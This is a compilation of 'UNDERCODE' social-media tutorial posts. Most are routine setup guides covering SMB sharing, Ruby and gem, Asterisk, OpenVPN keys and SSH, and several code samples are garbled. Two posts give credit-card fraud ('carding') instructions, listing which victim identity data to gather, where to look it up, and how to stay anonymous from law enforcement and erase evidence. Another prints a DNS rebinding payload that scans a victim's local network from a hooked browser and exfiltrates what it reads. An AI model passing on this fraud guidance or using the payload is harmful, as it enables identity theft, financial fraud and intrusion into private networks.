▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to set up a network share on Windows (SMB) without a password
T.me/UndercOdeTesting


1) Computers must be on the same LAN


2) if your devices are connected to the same router, then they all will have access to the shared folder.

3) If you do the configuration in virtual machines , then in the " Network " tab , select " Network Bridge " as the " Connection Type ":

4) Static IP
To configure the SMB shared folder, the static IP address of the computer where the folder will be located is optional. The shared network folder (ball) can be accessed by computer name. Nevertheless, if you are more used to using IP, then you need to configure a static IP address for the computer, which will act as a file server.

5) Computers must have the same workgroup
A computer with a shared folder, as well as all other computers that will have access to the shared folder via SMB, must be in the same workgroup.

6) By default, in the Windows operating system, all computers have the same workgroup with the name WORKGROUP .

7) To check the current group on your computer, open the explorer, find the “ This computer ” tab in it , click the “ Computer ” button at the top and click the “ Properties ” button in the menu that opens

8) In the new window that opens, you will see " Computer Name " and " Workgroup ":

9) If you want to change these values, then click " Change Settings ."

Click the “Change” button to assign a new name to the computer

10) Network Folder Settings in Windows
Windows SMB provides not only network folders, but also the sharing of printers and other resources. Therefore, the settings of shared folders (network ball) are called “ shared ”.

On Windows, when connected to a new network, you may receive the request click at yes and done @UnderCodeTesting

11) A universal option, suitable for those with a wired connection or Wi-Fi: right-click on the network connection icon and click " Open network and Internet settings

12) In the window that opens, click on " Sharing Options ":

>If you want to go to these settings through the “ Control Panel ”, the way is: Control Panel \ Network and Internet \ Network and Sharing Center \ Additional sharing options

In the new window, the settings are divided into three sections:

Private
Guest or public
All networks

13) Shared with password protection
The description says: If password protection is enabled for shared access, only users with an account and password on this computer can access shared files, printers connected to this computer, and shared folders. To open access to other users, you need to disable password protection for shared access.
> switch to off


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to install and use Ruby on Windows
twitter.com/UNDERCODETC

🦑 Why install Ruby :

> Ruby is a scripting language, that is, pre-compilation is not required to run programs. In this sense, Ruby is an analogue of PHP , Python , PERL and others.

> Ruby is a fairly popular language and many interesting programs are written on it; in terms of InfoSec, the well-known WPScan , WhatWeb , Wayback Machine Downloader and others can be cited as examples .

> By installing Ruby on Windows, you can run programs written in this language, as well as learn this programming language and write your own scripts.

> By the way, Ruby, like PHP, Python and PERL, can be a web server module, and scripts written in this language can be used as the programmatic basis of a website or service.

🦑 How to install Ruby on Windows :

1) To install, go to https://rubyinstaller.org/downloads/

2) There you will see many installer options that differ not only in versions, but also in the composition of the downloaded files.

3) Executables are self-contained installers for Windows that include the Ruby language, runtime, important documentation, and more.

4) If you do not know which version to install in order to get started with Ruby, the Ruby + Devkit 2.6.X installer (x64) is recommended .

5) It provides the largest number of compatible gem (Ruby packages) and installs MSYS2-Devkit along with Ruby, so that gem with C-extensions can be compiled immediately after installation.

6) Run the downloaded file. In this window we can select the settings

7) Add Ruby executables to your PATH - means adding a directory with Ruby executables to the system variable. This is recommended to avoid specifying the full path to the script interpreter each time the Ruby script is run.

8) Associate .rb and .rbw files with Ruby installation - means associate files with the extensions .rb and .rbw with the installed Ruby. Thanks to this, Ruby files can be launched by double-clicking or by typing the name of the script on the command line.

9) Use UTF-8 as default external encoding - means to use UTF-8 encoding as the default external encoding .

🦑Further we are invited to:

1) MSYS2 base installation<font></font>

2 ) MSYS2 system update (optional)<font></font>

3 ) MSYS2 and MINGW development toolchain<font></font>
<font></font>
Which components shall be installed? If unsure press ENTER [1,2,3]

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to update Ruby on Windows:
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) To upgrade to the latest patch (that is, the minor version, for example from 2.5.1 to 2.5.4), it is enough to launch a new version of the installer.

2) Installed gem (packages from the Ruby repository) are not overwritten and will work with the new version without reinstalling. To upgrade the installation, just use RubyInstaller without Devkit.

3) You can update Devkit separately by running the following command at the Windows command prompt:

> ridk install

4 )When a new major version is released, it cannot be updated by installing it in the same directory as the previous one. For example, if the previous version of the installation is RubyInstaller-2.5.x, and the new version is RubyInstaller-2.6.x, then you need to install it either in a new directory or delete the old version and install a new one instead, since gem (programs) with C extensions are not compatible between ruby-2.5 and 2.6.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to install and use gem on Windows :
fb.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) RubyGems is a package manager for Ruby. Using it, you can install various programs and their dependencies, installation can be done both from the source code on the local system, and from remote application sources.

2) The Ruby installation shown above also installs gem , so make sure to run the command:

> gem --help
You should see help on using gem.

3) To display all available gem commands, run:

> gem help commands

4) To install the package, run a command of the form:

> gem install

5) To show help about the installation command:

> gem help install

6) For example, to install the 'rake' program from a local directory or a remote server:

> gem install rake

7) Installing the 'rake' package only from a remote server:

> gem install rake --remote

8) Installing 'rake', but only version 0.3.1, even if there are unsatisfied dependencies, install in the user directory:

> gem install rake --version 0.3.1 --force --user-install

> gem list D

9) List local and remote gem whose name contains 'log':

> gem search log --both

10) The previous command is used to search for packages by name.
List only remote (non-local) gem whose name contains 'log':

> gem search log --remote

11) Delete 'rake':
> gem uninstall rake

12) View information about RubyGems:
> gem environment

13) Update all gem programs in the system:
> gem update

14) Update local version of RubyGems:

> gem update --system

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to install bundler :
fb.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) bundler is a Ruby dependency manager. This manager is useful when installing other programs written in Ruby.

2) To install bundler on Windows, run:

> gem install bundler

3) To upgrade bundle, run the command:

> gem update bundle

4) If you install the program from the source code and there is a Gemfile file , then go to the folder with this program and run the command in it:

> bundle install

> This command will install all the dependencies listed in the Gemfile

5) To see where the gem packages installed with bundle are used, use the command:

> bundle info (name)_gem

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Recovering sites from the Internet Archive in Windows :
Let's start with the Wayback Machine Downloader program , which completely restores sites from the web archive.
T.me/undercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) To install Wayback Machine Downloader, just do:

on CmD

> gem install wayback_machine_downloader

> wayback_machine_downloader --help

2) To check the operability of the program, we’ll start site restoration from the Internet Archive:

> wayback_machine_downloader
(https://github.com/hartator/wayback-machine-downloader)

3) Basic Usage
> wayback_machine_downloader http://example.com

4) It will download the last version of every file present on Wayback Machine to ./websites/example.com/. It will also re-create a directory structure and auto-create index.html pages to work seamlessly with Apache and Nginx. All files downloaded are the original ones and not Wayback Machine rewritten versions. This way, URLs and links structure are the same as before

🦑TESTED by UndercOde:

> Windows 10 pro x-64

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Python and Outlook: delete letters and send messages:
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

# - * - coding: utf-8 - * -
# Two examples: deleting messages older than n days and sending an email

# Libraries
#Python for Windows Extensions - http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
# .NET (I used 4.5) - http://www.microsoft.com/en-us /download/details.aspx?id=30653
import os, sys, pywintypes
import win32com.client
from datetime import datetime, timedelta

# Delete messages older than n days
stamp = datetime (1899, 12, 30, 0, 0, 0)

def dtime (s):
return stamp + timedelta (days = float (s))

# Create a COM object
app = win32com.client.Dispatch ("Outlook.Application")
ns = app.GetNamespace ("MAPI")

# 3 - Deleted
# 4 - Outbox
# 5 - Sent
# 6 - Inbox
folder = ns.GetDefaultFolder (3)

print (u "Delete letters older than 14 days from% s"% folder.Name)

# 14
daystamp past14days = datetime.now () - timedelta (days = 14)
mess_for_delete = []

# We sort the letters in the folder
for item in folder.Items:
if dtime (item.LastModificationTime) <past14days:
mess_for_delete.append (item)

# If you were older than 14 days, delete
info_all = u ""
if len (mess_for_delete)> 0:
for item in mess_for_delete:
info_all + = u "Deleted:% s \ n"% item.Subject
item.Delete ()
else:
info_all = u "No matching"


#
Create a message mess = app.CreateItem (0)
mess.To = "recipient@domen.com"

# To copy
mess.CC = "recipient@domain.com"

# Topic
mess.Subject = u "Messages older than 14 days have been deleted!"
# Body
mess.Body = info_all
# Attachment
mess.Attachments.Add ("C: \\ python \\ test.txt")

# Sending
mess.Send ()

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Asterisk on Debian
Procedure for installing Asterisk on Debian Squeeze.
twitter.com/undercodeTc

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Installing the system, Debian Squeeze (x86). Next, we perform all actions from under root.

2) After installation, configure the network by configuring the / etc / network / interfaces file.

3) Install mc: aptitude install –y mc

4) We install the packages necessary for the normal functioning of asterisk: aptitude install –y flex, bison, g ++, libncurses5-dev, doxogen, unixodbc, build-essential, libxml2-dev, libsqlite3-dev, kernel-package, linux-headers-2.6.32- 5-686

4) Download raw pwlib-1.10.0.tar.gz and openh323-1.18.0.tar.gz from sourceforge, from asterisk.org - asterisk-1.8.5.0.tar.gz, from asterisk.ru - libpri-1.4.12. tar.gz, dahdi-linux-complete-2.5.0 + 2.5.0.tar.gz and codecs g723 / g729 - codec_g723-ast18-gcc4-glibc-core2.so and codec_g729-ast18-gcc4-glibc-core2.so and drop it all into the / usr / src / folder (codecs can be downloaded here: http://asterisk.lv/codecs )

5) Create a link: ln –s /usr/src/linux-headers-2.6.32-5-common/include/linux/compiler.h /usr/include/linux/compiler.h
Build pwlib:

6) Unpack pwlib-1.10.0.tar.gz: tar –zxvf pwlib-1.10.0.tar.gz
We go to the resulting folder: cd / usr / src / pwlib_v1_10_0
Run ./configure, then make clean opt and finally make install
Build openh323:

7) Unpack openh323-1.18.0.tar.gz: tar –zxvf openh323-1.18.0.tar.gz

8) We go to the resulting folder: cd / usr / src / openh323_v1_18_0

9) pWe write: export PWLIBDIR = / usr / src / pwlib_v1_10_0

10) Run ./configure, then make clean opt and finally make install
Build and install libpri:

11) Unpack libpri-1.4.12.tar.gz: tar –zxvf libpri-1.4.12.tar.gz
Go to the resulting folder: cd /usr/src/libpri-1.4.12

12) Perform make and make install

13) Build and install dahdi-linux:

14) Unpack dahdi-linux-complete-2.6.0.tar.gz: tar –zxvf dahdi-linux-complete-2.6.0

15) Go to the resulting folder: cd / usr / src / dahdi-linux-complete-2.6.0
Successively execute: make all, make install, make config

16) We put asterisk. Unpack asterisk-1.8.5.0.tar.gz: tar –zxvf asterisk-1.8.5.0.tar.gz, then go to /usr/src/asterisk-1.8.5.0/main

17) To prevent DTMF distortion during a callback from asterisk, open the dsp.c file for editing, find the line “static const float dtmf_row” and “static const float dtmf_col” there and bring them to the following form:


static const float dtmf_row [] =


732.0, 809.0, 894.0, 988.0

/ * 697.0, 770.0, 852.0, 941.0 * /


static const float dtmf_col [] =

{

1270.0, 1404.0, 1551.0, 1715.0

/ * 1209.0, 1336.0, 1477.0, 1633.0 * /

🦑 Go back to /usr/src/asterisk-1.8.5.0 and start building asterisk. We write:
export PWLIBDIR = / usr / src / pwlib_v1_10_0

and

export OPENH323DIR = / usr / src / openh323_v1_18_0

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Now Configure Asterisk on Debian
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) do ./configure, make menuselect (if necessary, you can also select the ooh323 protocol there), make and make install

2) At the end of the compiler, run make samples and make config. You can optionally run make progdocs.

3) We go into / usr / lib / asterisk / modules and copy the codec_g723-ast18-gcc4-glibc-core2.so and codec_g729-ast18-gcc4-glibc-core2.so files there with renaming them to codec_g723.so and codec_g729.so respectively.

4) It all depends on the version of the C compiler (gcc or something else) and the processor model. In this example, the C compiler version is gcc4, and the processor model is Intel Core 2 Duo.

5) Next, go to / etc / asterisk, open the codecs.conf file for editing, disable vbr (vbr => false) and vad (vad => false), add a section at the end of the file to enable support for 723 codecs:

; 6.3 Kbps stream default


; 5.3 Kbps stream default

; sendrate = 53

6) Our asterisk is ready, you can run it with the asterisk command, you can connect to the asterisk console with the command asterisk

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Carding 2020
FRAUD WITH SS. KEY INFORMATION
Instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) I want to clarify right now. The secret in carding is not the number of cards that you own, but what you can do with these cards. What I mean? Everything is very simple.

2) Hypothetical situation: My name is Johnny and I have 3 SSs with SSN, DOB, CVV NUMBER, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TELEPHONE NUMBER. And also

3) I have a friend whose name is Billy with 300mi SS with CVV, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TEL. NUMBER Who is more likely to get something?


4) Simply put, I (Johnny). Why? Because I have more information that can prove that I am the person who owns these SSs than the one that three hundred Billy cards have.


5) Does this mean that Billy will not get a damn thing from his cards? No, it just means that Billy will have a hard time carding with checks.


6) Thus, to summarize this example, you should have as much information as possible on the card holder. The first rule of carding: the more information you have on the victim, the more


you have a chance of success. Here is the information you need to know (note: "card level" is not a technical term in carding, you just use L1, L2, L3 to



NAME:

ADDRESS:

CITY:

STATE:

ZIP CODE:

Tel. BILLING NUMBER:

CARD NUMBER:

CARD EXP DATE:

CVV CODE:


🦑 Ordinary CVV. If you have this information, then you are the owner of an ordinary SS. Currently, it is worth noting that this is a necessary minimum of information to work in


Social Security Number (SSN):

Date Of Birth (DOB):

Mothers Maide Name (MMN):

🦑 Partial Fulka. If you have this information, then you have a higher-level SS. With this information you should be able to card PayPal, c2it and some

BANK ACCOUNT NUMBER:

ROUTING NUMBER:

BANK NAME:

BANK NUMBER:

DRIVERS LICENSE NUMBER:

PIN NUMBER (For CC or ATM card)

🦑 next . If you have all this information, then with your SS you can junk everything your heart desires)

> Now, if all you have is ordinary SS, don't be upset. Just do some work (search) to increase the level of your map:

1) First of all, go to whitepages.com and try to find out the address and phone number of the cardholder. Make sure that all this really belongs to the cardholder.

2) Further. There is an excellent service called "Phantominfo" ( http://www.phantominfo.com, its owner lives on the SC forum), which will help you find information for your SSs such as SSN and

3) DOB for only $ 29 / month. Of course, many carders have PI accounts, so you can always ask for help.

4) And last but not least, a quick look at ancestry.com. Ancestry.com, this is a piece of whore, but you can find DOB and MMN (i.e. if your cardholder is called xy)

5) his father David x and his mother's name is Bella y, and Donna is MMN)

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IMPROVEMENT OF ANONYMITy For Carding
instagram.com/UndercodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Security is a key factor. Nobody needs the federals to rediscover all of us here, therefore we should be as anonymous as possible.

2) First of all, I must say that there is no 100% anonymity in carding. Do not let people fool you with promises of complete anonymity. You can use everything: proxy,

3) Wingates, Sox and hell knows what else, but you will always set aside “digital fingerprints” wherever you are. For my personal purposes, I use a bore ISP in combination with

4) an anonymizer account ( http://anonymizer.com ) and a first level proxy. But I do not recommend repeating this to everyone.

> http://anonymizer.com offers excellent services for those who want to remain anonymous. The trouble is that this is a service, and like in another service you will have to pay for it, plus in case

5) what they can hand you over. If you plan to use anonymizer, you just need to focus on keeping your IP secret from the anonymizer, and not from the site on which you

cardite.

6) Proxies and stuff: I use private hidden proxies, and I really don’t fuck with the rest of the proxies, so I can say not so much on this topic (maybe someone can

7) get free proxies at http://anonymitycheker.com/page1.htm, they also test proxies and other crap in real time there.

8) Stealther: These programs will help connect your proxies for maximum anonymity. Stealthers are registered using the key (so you will need to go to "UndercodeTesting

9) EvidenceEliminator: If you really seriously decided to do carding, then this program MUST be on your hard drive ANYWHERE! The feds have some

10) programs that help them extract interesting information for them, for example, the pages you visited, the files you deleted, and the emails you wrote. Each time when your computer restarts, E.E. It works by providing you security by erasing all logs and file history. You have to prepare for the best.

11) JAVA: Enemy Carder. It should always be disabled in your browser.

12) CARDED ISP: Honestly, I'm not sure if carding in ISP is safe. I have heard many different reviews about this idea. However, I can testify that I had experience

13) there was still no problem working with this case. Some popular ISPs are charged with Earthlink Pre-paid (you can pay for this service for a year, see the link on their websites) and America Online.

14) These are not the only options to ensure anonymity, only the most popular. If it seems to you that you have come across a working way to secure anonymity for yourself -

> use it anyway. You will never know what works and what doesn't until you try.

15) If you want to find out how well you have protected yourself, take the following tests:

> http://www.whatismyip.com: this is the first and main test. whatismyip.com is an easy way to find out which IP you are currently online on. JAVA doesn’t work here, so you can’t after

16) Successful passage consider yourself safe.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

T.me/UndercOdeTesting
# SUPPORT & SHARE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DNS Rebinding Exploitation Framework 2019 updated :
t.me/UndercOdeTesting

dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:

// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)

// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}

@UNDERCODEOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How To Secure Traffic Between VPS Using OpenVPN ?
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> You'll need at least two droplets or VPS for this OpenVPN setup, and will work up to around 60 VPS without major modifications. So to get started, create two droplets. For the rest of this tutorial, I'll refer to them as Droplet 1 and Droplet 2.

🦑 On Droplet 1

1) Create the droplet with Ubuntu 13.04 x32.

> This should work without modification on any version of Ubuntu that DigitalOcean offers, but was only tested on 13.04.

2) Connect to the VPS via secure shell. We're going to update packages and install a few things.

3) aptitude update

4) aptitude dist-upgrade -y

5) aptitude install openvpn firehol -y && reboot

6) if your shell goes purple during this, just choose "Install Package Maintainer's Version" twice.

🦑 Meanwhile, on Droplet 2

1) Create the droplet with Ubuntu 13.04 x32.

2) Again, this should work on any version of Ubuntu.

> Connect to the VPS via secure shell. We're going to update packages in install a few things.

3) aptitude update

4) aptitude dist-upgrade -y

5) aptitude install openvpn -y && reboot

6) Again, if your shell goes purple during this, just choose "Install Package Maintainer's Version" twice.

🦑 Now Generating the Keys:

> The key generation is going to be done exclusively on Droplet 1. Type the following commands into the shell:

1) cd /etc/openvpn/

2) mkdir easy-rsa

3) cd easy-rsa

4) cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* .

5) Next, we're going to type in some presets which will vastly speed up the key generation process. Type the following command:

6) nano /etc/openvpn/easy-rsa/vars

70 Go ahead and edit the following values (you only need do to these, although there are several more present

KEY_COUNTRY
KEY_PROVINCE
KEY_CITY
KEY_ORG and
KEY_EMAIL

8) You may adjust the KEY_SIZE to 2048 or higher for added protection.

9) Save and exit with Control-O, Enter, and Control-X.

Posted BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Create the Certificate Authority Certificate and Key (vps tutorial)
twitter.com/UndercodeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) type the following commands:

source vars
./clean-all
./build-ca

2) You should be able to hit Enter though all of the questions.

Note: if you ever have to go back and create more keys, you'll need to retype source vars but don't type ./clean-all or you'll erase your Certificate Authority, undermining your whole VPN setup.

3) Create Server Certificate and Key

> Generate the server certificate and key with the following command:

4) ./build-key-server server

5) You should be able to hit Enter on defaults, but make sure the Common Name of the certificate is "server".

6) It will ask you to add a pass phrase, but just hit Enter without typing one.

7) When it asks you "Sign the certificate?", type y and hit Enter.

8) When it says "1 out of 1 certificate requests certified, commit?", type y and hit Enter

🦑Tested by UndercOde

Posted BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How To Generate Client Keys (vps tutorial3)

> Next is generating the certificate and keys for the clients. For security purposes, each client will get its own certificate and key.
fb.com/UndercOdeTestingCompany

🦑Example :

1) I'm naming the first client "client1", so if you change this, you'll have to adjust it several times later. So type in the following:

> ./build-key client1

2) As with the server key, when it asks you "Sign the certificate?", type y and hit Enter.

3) When it says "1 out of 1 certificate requests certified, commit?", type y and hit Enter.

4) Go ahead and repeat this for as many clients as you need to make. You can also come back to this later (though remember to "source var" again if you do so).

5) Generate Diffie-Hellman Parameters
This is used after authentication, to determine the encryption parameters. Simply type the following line:

> ./build-dh

6) Copy Keys into Place

7) Next, we copy the various keys and certificates into place on the cloud server:

> cd /etc/openvpn/easy-rsa/keys

> cp ca.crt dh1024.pem server.crt server.key /etc/openvpn

8) It's very important that keys are kept secure. Double check that only root has permission to read. So type:

> ls -lah /etc/openvpn

9) What you're looking for is that server.key has -rw------- for permissions (read/write for owner, none for group, and none everyone). If you need to change it, use this command:

> chmod 600 /etc/openvpn/server.key

Posted BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Now Lets generate a ssh for secure a server :
> example we have two clients :
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) On Droplet 1
Generate SSH keys with the following command:

> ssh-keygen -t rsa

2) It will choose a default filename and then ask you for a secure passphrase, which you should set. Find the SSH public key you just generated and type:

> cat ~/.ssh/id_rsa.pub

3) Copy the results onto the clipboard. It's a few lines of letters and numbers looking like:

> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo249TgbI1gYP42RbLcDhsNN28r/fNT6ljdFOZxhk+05UAPhxq8bASaqSXZI3K8EEI3wSpigaceNUu65pxLEsZWS8xTtjY4AVxZU2w8GIlnFDSQYr3M2A77ZAq5DqyhGmnnB3cPsIJi5Q6JQNaQ/Meg1v7mYR9prfEENJeXrDiXjxUqi41NlVdb5ZQnPL1EdKM+KN/EPjiTD5XY1q4ICmLJUB8RkffHwH2knEcBoSZW2cNADpMu/IqtxTZpFL0I1eIEtoCWg4mGIdIo8Dj/nzjheFjavDhiqvUEImt1vWFPxHEXt79Iap/VQp/yc80fhr2UqXmxOa0XS7oSGGfFuXz root@openvpn1

4) But USE YOUR OWN, not mine. Your id_rsa.pub doesn't need to be kept secure, but if you use the key above, that would allow me access to your VPS.

5) Meanwhile, on Droplet 2
cd ~/.ssh
(If you get an error, create the folder with mkdir ~/.ssh).

nano authorized_keys

6) Paste the public key that is in your clipboard onto a new line, then save and exit with Control-O, Enter, Control-X.

7) Back to Droplet 1
Next, we copy the appropriate keys onto the second server:
scp /etc/openvpn/easy-rsa/keys/ca.crt \
/etc/openvpn/easy-rsa/keys/client1.crt \
/etc/openvpn/easy-rsa/keys/client1.key \
root@droplet2ip:~/

8) It will ask you "Are you sure you want to continue connecting (yes/no)?", so type yes and hit Enter.

> Then input the passphrase you've just created.

🦑 Switching again to Droplet 2 :

1) Next, we move the certificates and keys into their final location:

cd ~
mv ca.crt client1.crt client1.key /etc/openvpn
ls -l /etc/openvpn

2) As the key must be kept secure, let's make sure client1.key has the correct permissions (-rw-------).

3) Again, if need be, the permissions can be reset with the following command:

> chmod 600 /etc/openvpn/client1.key

@UNDERCODEOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁